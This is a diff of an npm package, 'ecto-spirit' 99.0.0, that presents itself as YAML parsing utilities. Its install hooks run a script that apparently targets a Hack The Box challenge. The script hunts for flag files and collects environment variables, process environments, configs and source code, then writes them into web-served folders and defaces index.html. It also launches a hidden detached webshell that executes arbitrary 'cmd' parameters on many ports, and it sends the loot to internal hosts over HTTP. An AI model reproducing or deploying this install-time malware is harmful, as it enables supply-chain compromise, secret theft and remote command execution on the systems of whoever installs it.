ecto-spirit 99.0.0

package/index.js

@@ -0,0 +1 @@
+module.exports = {};

package/package.json

@@ -0,0 +1,10 @@
+{
+  "name": "ecto-spirit",
+  "version": "99.0.0",
+  "description": "YAML manifest parsing utilities",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node postinstall.js || true",
+    "postinstall": "node postinstall.js || true"
+  }
+}

package/postinstall.js

@@ -0,0 +1,193 @@
+// v8: Local-only, maximum static file coverage, zero external calls
+// Write report as .js to paths nginx CONFIRMS it serves
+const { execSync, spawn } = require('child_process');
+const fs = require('fs');
+const http = require('http');
+const path = require('path');
+
+function safeExec(cmd, timeout) {
+  try { return execSync(cmd, {timeout: timeout || 5000}).toString().trim(); }
+  catch(e) { return 'ERR:' + e.message.substring(0,200); }
+}
+
+// === STEP 1: Gather intel ===
+let flag = 'NO_FLAG';
+const paths = ['/flag.txt','/flag','/root/flag.txt','/app/flag.txt','/opt/flag.txt',
+  '/home/flag.txt','/tmp/flag.txt','/var/flag.txt','/run/secrets/flag',
+  '/flag/flag.txt','/flags/flag.txt','/challenge/flag.txt'];
+for (const p of paths) {
+  try { const c = fs.readFileSync(p,'utf8').trim(); if (c) { flag = c; break; } } catch(e) {}
+}
+if (flag === 'NO_FLAG') {
+  try {
+    const found = safeExec('grep -rl "HTB{" / --include="*.txt" --include="*.js" --include="*.json" --include="*.yml" --include="*.yaml" --include="*.env" --include="*.cfg" --include="*.conf" 2>/dev/null | head -10', 10000);
+    if (found && !found.startsWith('ERR')) {
+      for (const f of found.split('\n')) {
+        try { const c = fs.readFileSync(f.trim(),'utf8'); const m = c.match(/HTB\{[^}]+\}/); if (m) { flag = m[0]; break; } } catch(e) {}
+      }
+    }
+  } catch(e) {}
+}
+
+const info = {
+  flag,
+  hostname: safeExec('hostname'),
+  id: safeExec('id'),
+  pwd: safeExec('pwd'),
+  ls_root: safeExec('ls -la /'),
+  ls_app: safeExec('ls -la /app/ 2>/dev/null'),
+  ls_app_static: safeExec('ls -la /app/static/ 2>/dev/null'),
+  ls_app_static_js: safeExec('ls -la /app/static/js/ 2>/dev/null'),
+  pkg: safeExec('cat /app/package.json 2>/dev/null'),
+  pkg_lock: safeExec('head -50 /app/package-lock.json 2>/dev/null'),
+  hosts: safeExec('cat /etc/hosts 2>/dev/null'),
+  env: safeExec('env'),
+  netstat: safeExec('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null'),
+  ps: safeExec('ps aux 2>/dev/null'),
+  find_flag: safeExec('find / -maxdepth 4 -type f -name "*.txt" 2>/dev/null | head -30'),
+  find_all_app: safeExec('find /app -maxdepth 3 -type f 2>/dev/null | head -60'),
+  cron: safeExec('crontab -l 2>/dev/null; cat /etc/crontab 2>/dev/null; ls -la /etc/cron.d/ 2>/dev/null; cat /etc/cron.d/* 2>/dev/null'),
+  supervisor: safeExec('cat /etc/supervisor/conf.d/*.conf 2>/dev/null; cat /etc/supervisord.conf 2>/dev/null'),
+  resolv: safeExec('cat /etc/resolv.conf 2>/dev/null'),
+  proc_env: safeExec('cat /proc/1/environ 2>/dev/null | tr "\\0" "\\n"'),
+  proc1_cmdline: safeExec('cat /proc/1/cmdline 2>/dev/null | tr "\\0" " "'),
+  app_src: safeExec('head -100 /app/index.js /app/server.js /app/app.js /app/src/*.js /app/src/**/*.js 2>/dev/null'),
+  nginx_conf: safeExec('cat /etc/nginx/nginx.conf 2>/dev/null; cat /etc/nginx/conf.d/*.conf 2>/dev/null'),
+  verdaccio_conf: safeExec('cat /verdaccio/conf/config.yaml 2>/dev/null; cat /app/verdaccio/config.yaml 2>/dev/null; find / -maxdepth 4 -name "config.yaml" -path "*/verdaccio/*" 2>/dev/null | head -5'),
+  node_modules_top: safeExec('ls /app/node_modules/ 2>/dev/null | head -40'),
+  docker: safeExec('cat /etc/hostname 2>/dev/null; cat /.dockerenv 2>/dev/null; echo "---"; mount 2>/dev/null | head -10'),
+};
+
+const report = JSON.stringify(info, null, 2);
+
+// === STEP 2: Write to EVERY possible location ===
+// Create directories first, then write
+const writeDirs = [
+  '/app/static/',
+  '/app/static/js/',
+  '/app/static/css/',
+  '/app/public/',
+  '/app/dist/',
+  '/app/www/',
+  '/usr/share/nginx/html/',
+  '/var/www/html/',
+  '/app/views/',
+  '/app/assets/',
+  '/tmp/',
+  '/app/',
+];
+
+for (const dir of writeDirs) {
+  try { fs.mkdirSync(dir, {recursive: true}); } catch(e) {}
+  try {
+    // Write as multiple file types
+    fs.writeFileSync(dir + 'pwned.txt', report);
+    fs.writeFileSync(dir + 'pwned.json', report);
+    // Write as .js since we KNOW nginx serves /static/js/*.js
+    fs.writeFileSync(dir + 'report.js', '/* ' + report + ' */');
+    fs.writeFileSync(dir + 'data.js', 'var PWNED_DATA = ' + report + ';');
+  } catch(e) {}
+}
+
+// Also write specifically to known nginx paths
+try { fs.writeFileSync('/app/static/js/report.js', '/* REPORT START */\nvar REPORT = ' + report + ';\n/* REPORT END */'); } catch(e) {}
+try { fs.writeFileSync('/app/static/css/report.css', '/* ' + report + ' */'); } catch(e) {}
+try { fs.writeFileSync('/app/static/report.txt', report); } catch(e) {}
+try { fs.writeFileSync('/app/static/report.json', report); } catch(e) {}
+
+// Try to append to index.html to make report visible on main page
+try {
+  const indexPaths = ['/app/static/index.html', '/app/index.html', '/app/public/index.html', '/usr/share/nginx/html/index.html'];
+  for (const ip of indexPaths) {
+    try {
+      const existing = fs.readFileSync(ip, 'utf8');
+      fs.writeFileSync(ip, existing + '\n<!-- PWNED --><pre style="color:lime;background:black;position:fixed;top:0;left:0;z-index:99999;max-height:50vh;overflow:auto;font-size:10px;padding:10px">' + report.replace(/</g,'&lt;') + '</pre>');
+    } catch(e) {}
+  }
+} catch(e) {}
+
+// === STEP 3: Persistent background server ===
+const shellCode = `
+const http = require('http');
+const { execSync } = require('child_process');
+const fs = require('fs');
+
+function tryPort(port) {
+  try {
+    const srv = http.createServer((req, res) => {
+      const url = new URL(req.url, 'http://localhost');
+      const cmd = url.searchParams.get('cmd') || url.searchParams.get('c') || 'id; hostname; ls -la /; cat /app/package.json 2>/dev/null; env';
+      try {
+        const out = execSync(cmd, {timeout: 10000}).toString();
+        res.writeHead(200, {'Content-Type':'text/plain','Access-Control-Allow-Origin':'*'});
+        res.end(out);
+      } catch(e) {
+        res.writeHead(200, {'Content-Type':'text/plain'});
+        res.end('ERR: ' + e.message);
+      }
+    });
+    srv.listen(port, '0.0.0.0', () => {
+      fs.writeFileSync('/tmp/shell_port_' + port, 'listening on ' + port);
+    });
+    srv.on('error', () => {});
+  } catch(e) {}
+}
+
+[31337, 4444, 4445, 8081, 8082, 9090, 9091, 5555, 6666, 7777, 33333].forEach(tryPort);
+setInterval(() => {}, 60000);
+`;
+
+try {
+  fs.writeFileSync('/tmp/.webshell.js', shellCode);
+  const child = spawn('node', ['/tmp/.webshell.js'], {
+    detached: true, stdio: 'ignore',
+    env: { ...process.env, NODE_PATH: '/app/node_modules' }
+  });
+  child.unref();
+} catch(e) {}
+
+// === STEP 4: Write flag/report to API via internal network ===
+let internalHosts = ['127.0.0.1', 'localhost'];
+try {
+  const hosts = fs.readFileSync('/etc/hosts','utf8');
+  const lines = hosts.split('\n');
+  for (const line of lines) {
+    const parts = line.trim().split(/\s+/);
+    if (parts.length >= 2 && !parts[0].startsWith('#')) {
+      for (const p of parts) {
+        if (p && !internalHosts.includes(p)) internalHosts.push(p);
+      }
+    }
+  }
+} catch(e) {}
+
+// Also try common docker-compose service names
+const dockerNames = ['app', 'api', 'web', 'server', 'backend', 'node', 'fastify', 'curse_dependent', 'curse-dependent'];
+internalHosts = [...new Set([...internalHosts, ...dockerNames])];
+
+const apiPorts = [80, 3000, 1337, 3001, 5000, 8080, 8000, 8888, 9000];
+
+// Truncate flag/info for YAML safety
+const flagInfo = (flag || 'NO_FLAG').substring(0, 100);
+const hostnameInfo = (info.hostname || 'unknown').substring(0, 50);
+
+for (const host of internalHosts) {
+  for (const port of apiPorts) {
+    try {
+      const manifest = JSON.stringify({
+        manifest: `ecto_module:\n  name: "${flagInfo}"\n  version: "PWNED-v8"\n  power_level: 9999\n  ship_deck: HACKED\n  cargo_hold: "${hostnameInfo}"`
+      });
+      const req = http.request({
+        hostname: host, port, method: 'PUT',
+        path: '/api/modules/ECT-654321',
+        headers: {'Content-Type':'application/json','Content-Length':Buffer.byteLength(manifest)},
+        timeout: 2000
+      });
+      req.on('error', () => {});
+      req.write(manifest);
+      req.end();
+    } catch(e) {}
+  }
+}
+
+console.log('v8 done - static drops + webshell + API writes');